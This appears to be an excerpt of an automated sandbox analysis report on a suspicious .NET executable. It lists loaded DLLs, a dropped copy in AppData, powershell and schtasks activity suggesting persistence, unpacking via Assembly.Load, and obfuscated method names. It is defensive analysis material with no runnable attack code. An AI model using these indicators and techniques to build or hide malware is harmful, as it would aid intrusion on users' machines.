                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: l2rMtmFkD6.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: l2rMtmFkD6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    barindex
                    .NET source code contains potential unpacker
                    Source: 0.2.l2rMtmFkD6.exe.5a70000.4.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.cs.Net Code: JQYS2GA6rI System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.l2rMtmFkD6.exe.2a0c9fc.0.raw.unpack, MainForm.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.cs.Net Code: JQYS2GA6rI System.Reflection.Assembly.Load(byte[])
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_00CBEEDA push eax; iretd 0_2_00CBEEE1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C435C3 pushfd ; ret 0_2_05C435D2
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C435E3 pushfd ; ret 0_2_05C43602
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4D488 push ebp; ret 0_2_05C4D45A
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4C128 push ebp; ret 0_2_05C4C136
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4C0E8 push esp; ret 0_2_05C4C0F6
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4BDA8 push 544805C5h; ret 0_2_05C4BDB6
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C47C9E pushfd ; ret 0_2_05C47C9F
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4BE38 push esp; ret 0_2_05C4BE46
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4D9D5 push esp; ret 0_2_05C4D9D6
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DBE1 push ebp; ret 0_2_05C4DBEE
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DB40 push ebp; ret 0_2_05C4DB42
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DB4F push ebp; ret 0_2_05C4DB51
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DB0A push ebp; ret 0_2_05C4DB18
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DAC2 push ebp; ret 0_2_05C4DAC3
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DAE0 push ebp; ret 0_2_05C4DAE1
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeCode function: 0_2_05C4DA96 push ebp; ret 0_2_05C4DA9B
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_02595718 pushfd ; retn 0004h11_2_02595732
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCD450 push edx; iretd 11_2_04CCD462
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCD463 push edx; iretd 11_2_04CCD467
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCC538 push ds; iretd 11_2_04CCC546
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCA263 push ds; iretd 11_2_04CCA26E
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCD348 push eax; iretd 11_2_04CCD352
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCA801 push ds; iretd 11_2_04CCA80E
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCEBE0 push eax; iretd 11_2_04CCEBEE
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_04CCEB69 push eax; iretd 11_2_04CCEBEE
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 11_2_05D135E7 pushfd ; retf 0005h11_2_05D13602
                    Source: C:\Users\user\AppData\Roaming\ECcZgk.exeCode function: 14_2_06ACEFE0 push es; ret 14_2_06ACEFF0
                    Source: l2rMtmFkD6.exeStatic PE information: section name: .text entropy: 7.724539676194917
                    Source: ECcZgk.exe.0.drStatic PE information: section name: .text entropy: 7.724539676194917
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, HS3UGjS4dyhetetOko.csHigh entropy of concatenated method names: 'SI8IkHDhQ9', 'hEtIUfuXrO', 'msQI6jhcjF', 'E0lI5ri1SJ', 'sCbIdSItMw', 'aIfI9w6W4d', 'sQUysgJkpObOC5kKkY', 'Y47niRP7AhfInIqnMh', 'fyj2FarlKaU3eOfXCo', 'MyMIIjfELw'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, GPKmg6PBNp1Go8FXJa.csHigh entropy of concatenated method names: 'fBkuIqCjmy', 'IGZuy83tTH', 'WVNuSpWc97', 'ORvuliFpF5', 'veLuOgtNEx', 'yROuDSGQRW', 'lSSuoqLm6F', 'mxSWQT5Kon', 'qfcWayq7EO', 'vvFWsboYVt'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, x8Wai58sQjhcjF80lr.csHigh entropy of concatenated method names: 'oBvEmQ7VHD', 'sIRETqcL75', 'RAqEfmQRZF', 'YWbE8DLE6m', 'OafEdIfug8', 'a03E9S9ib0', 'h4EErSyB93', 'AWdEWPNOpl', 'J7AEuvffsx', 'JEXEe5lE8q'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, Q1SJ81X2uYyCoeCbSI.csHigh entropy of concatenated method names: 'M9eDGp42Ls', 'i2IDAw87gF', 'YsBEZo6Bc8', 'i1eEKtjrSd', 'pstEwviUAi', 'SwwE03XmrS', 'iZtEpQ4OLW', 'eu5ER6Qeop', 'nvPEFlNl5G', 'MyCEq0UK5R'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, NAOrPkEcVdZdY5vb0y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kBL3sHrPsE', 'sIw3PPIuN6', 'G1P3zPc5AL', 'ROlyNv9uSF', 'aoXyIiWxBw', 'Xo8y3oDXNR', 'H4uyyCuWlC', 'Yw902A2Ys0I7eNB1Ijc'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, nd8rSeaGhR6IXfvpaP.csHigh entropy of concatenated method names: 'nyoWlYoQTH', 'aWRWOxgEWJ', 'U4RWEy7Frq', 'TcXWDVRCpU', 'hYtWofVljy', 'EcRWk91sAx', 'GGEWUjQNre', 'QcnWvIxMHo', 'YpVW6gOg4G', 'fMEW5kU6bt'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, X9VLTpIIXQUUYtDcS68.csHigh entropy of concatenated method names: 'ToString', 'SxIey9PZjb', 'zS7eSpPxAi', 'aRFecOo9SB', 'Ep5elwWQq9', 'NEreO4e3C1', 'H9YeEH8Og5', 'TdGeDU1gfn', 'U2mNnq7ptRLM2xl0Ixh', 'VLSfgI7MuZ2SFdidUd5'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, LKBf0PiCcs2cb4t0Wm.csHigh entropy of concatenated method names: 'EVBgfAbpMP', 'K05g8iDhIx', 'wSogx3f0F6', 'vjIgYgRxZa', 'FNDgKkhUFG', 'y01gw0xEZG', 'Jf0gpCJ7b2', 'iefgRThglv', 'QrugqLZPrk', 'Snggt69Y9M'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, O2tGaT14GM0PR0bByI.csHigh entropy of concatenated method names: 'qpNra4GwoK', 'yU7rPNaBIq', 'z7rWN52Nha', 'wvVWIFkxUx', 'RdartAXFEg', 'xkYrjEXP7N', 'iKnriwdWPy', 'ivZrV6AKHR', 'olPr4yAOS7', 'dknrCVxiwf'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, EHDhQ9fEEtfuXrOd2d.csHigh entropy of concatenated method names: 'IcHOVCEBdT', 'A0AO4gdkmZ', 'ywlOChc6jA', 'mmUOnneJou', 'hk6OBNI1Tj', 'uukO1aMswm', 'H37OQPXQa4', 'wstOa4YZqe', 'oxXOs9LpEG', 'C0xOP4Uu0r'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, TQh3vTC7SUbllLjr5F.csHigh entropy of concatenated method names: 'ToString', 'teL9tpU2tE', 'Ock9Yj2SXe', 'wq69ZyL2rc', 'Qlq9KAI2GO', 'fQJ9weRBvW', 'Mvu90qFn8Z', 'vMl9pMuj16', 'PyX9RpR7SH', 'HcN9FFkv36'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, vRVBQ5pi5wIpjLbJ0F.csHigh entropy of concatenated method names: 'Mnekl7Wv4P', 'PUCkEftAbD', 'mNLkoaFujI', 'mRAoPOEMuR', 'vPuozp9CIY', 'Af8kN9aqrc', 'befkIvlOQE', 'FBGk3Sbxbr', 'rClkyKTC1M', 'tuAkS2F3il'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, NaWWy236mBYlIC15Ig.csHigh entropy of concatenated method names: 'Of623GOAp', 'QNFmRDnSb', 'XvJTMQmvn', 'RW2ACKioS', 'TFq8D9xEJ', 'YtAX7Di3c', 'K893J6FotHkPB2Rkc8', 'uqncu2bTgD0pLyY0AJ', 'F95WfHSCc', 'TFTedlkxs'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, T4Pxs9nCsGaJbVXZLr.csHigh entropy of concatenated method names: 'YXjr6nNnEt', 'PuEr5E0yrN', 'ToString', 'UUwrlkSdc3', 'H21rO3lk6r', 'oWwrEvcaOy', 'ILirDTTQ4y', 'zk0roOMMN7', 'i7RrkcIg29', 'YVcrU347Ve'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, bE2mGsIyHT2OX6boTqq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GDoeVimwAm', 'BFje4LDAv5', 'x3NeCo898a', 'VEyen3v6ZP', 'POjeBxNrtW', 'OwCe1XMOyH', 'BKPeQOuDhT'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, qKJJQiKg8PHsV2A7Rh.csHigh entropy of concatenated method names: 'JNRoM8lZWM', 'IQmoH7gls0', 'IY3o2y7r72', 'c2Rom1GU5k', 'fQ8oTbEMnw', 'f65oADXpj5', 'WGNo8Aumsc', 'uQPoXtBydn', 'VSnb83HgEnePP04fn9W', 'zNpTmHH4Y8hlZjl1FNy'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, CYJeEKV7oSpgndxICZ.csHigh entropy of concatenated method names: 'LFVdqDJ5Rr', 'o9SdjThRPT', 'oKYdVDaN3F', 'nbad4uIgHk', 'X2CdYOTgZs', 'nxydZMlWoy', 'UJNdKJn6p4', 'VSNdwxof08', 'MDTd00v0fR', 'je9dpvSfdI'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, hYO4sGINkmwQXfuFmpw.csHigh entropy of concatenated method names: 'GKjuHekkCE', 'lxpuh1bswT', 'Vfuu26DHhv', 'nWauml8Wdk', 'e6RuGwvO9e', 'RXauT1nWZJ', 'FiyuA9fkFo', 'I01ufx5saQ', 'su9u8y4mCj', 'UJ5uXFwNaw'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, OGIZdHO3vNmwVLxrLN.csHigh entropy of concatenated method names: 'Dispose', 'bgGIs1cjHd', 'o503Y04JaK', 'hHL339roQy', 'IgdIP8rSeG', 'yR6IzIXfvp', 'ProcessDialogKey', 'WPf3NiHkjp', 'gXU3INhEBZ', 'zMT33YPKmg'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, cekC21ULw7jnXCJgV1.csHigh entropy of concatenated method names: 'NtlycWe0df', 'CQZylfPKui', 'Ee7yOvZtbM', 'KVgyEcA25Z', 'XbUyDIIoW0', 'qQAyok6MFf', 'txsykipOhs', 'zJryUJu9vO', 'XdbyvGWFUe', 'Aaqy6bXyDO'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, XhO8u6zZZyZGdGFXJ9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HkuugdY9sA', 'y4MudcruRi', 'w7xu9yimlh', 'mmWur7Xl5C', 'FsfuWSkEM4', 'fwsuu7aVME', 'U3eueuqc1b'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, OMwIIfxw6W4dmq9fUH.csHigh entropy of concatenated method names: 'ObHocbldyW', 'CwPoOUAtqQ', 'ILloDTvekQ', 'wfcokGKI3F', 'I8ioUHPDJW', 'tamDBFnCHe', 'QosD1wRJV9', 'jFMDQa4cTQ', 'CedDaUCN7x', 'TXFDsKKi3S'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, kVEbfGFamCto0jMeSX.csHigh entropy of concatenated method names: 'rIdkHGjDGC', 'pgZkheuVVF', 'CUjk2NKMdZ', 'mD8kmTRAi3', 'x2kkGVPceH', 'BaxkTdoiEt', 'B3jkAfIZdU', 'FPJkfcYfOC', 'Wmvk81jLEm', 'VcwkX6GI5I'
                    Source: 0.2.l2rMtmFkD6.exe.5f90000.5.raw.unpack, DiHkjpsEXUNhEBZ2MT.csHigh entropy of concatenated method names: 'U4BWx0K6xd', 'KPkWY1ZZgn', 'mgCWZPiufu', 'iKTWKshajF', 'SxKWVXLMmq', 'XtRWwBgk7P', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, HS3UGjS4dyhetetOko.csHigh entropy of concatenated method names: 'SI8IkHDhQ9', 'hEtIUfuXrO', 'msQI6jhcjF', 'E0lI5ri1SJ', 'sCbIdSItMw', 'aIfI9w6W4d', 'sQUysgJkpObOC5kKkY', 'Y47niRP7AhfInIqnMh', 'fyj2FarlKaU3eOfXCo', 'MyMIIjfELw'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, GPKmg6PBNp1Go8FXJa.csHigh entropy of concatenated method names: 'fBkuIqCjmy', 'IGZuy83tTH', 'WVNuSpWc97', 'ORvuliFpF5', 'veLuOgtNEx', 'yROuDSGQRW', 'lSSuoqLm6F', 'mxSWQT5Kon', 'qfcWayq7EO', 'vvFWsboYVt'
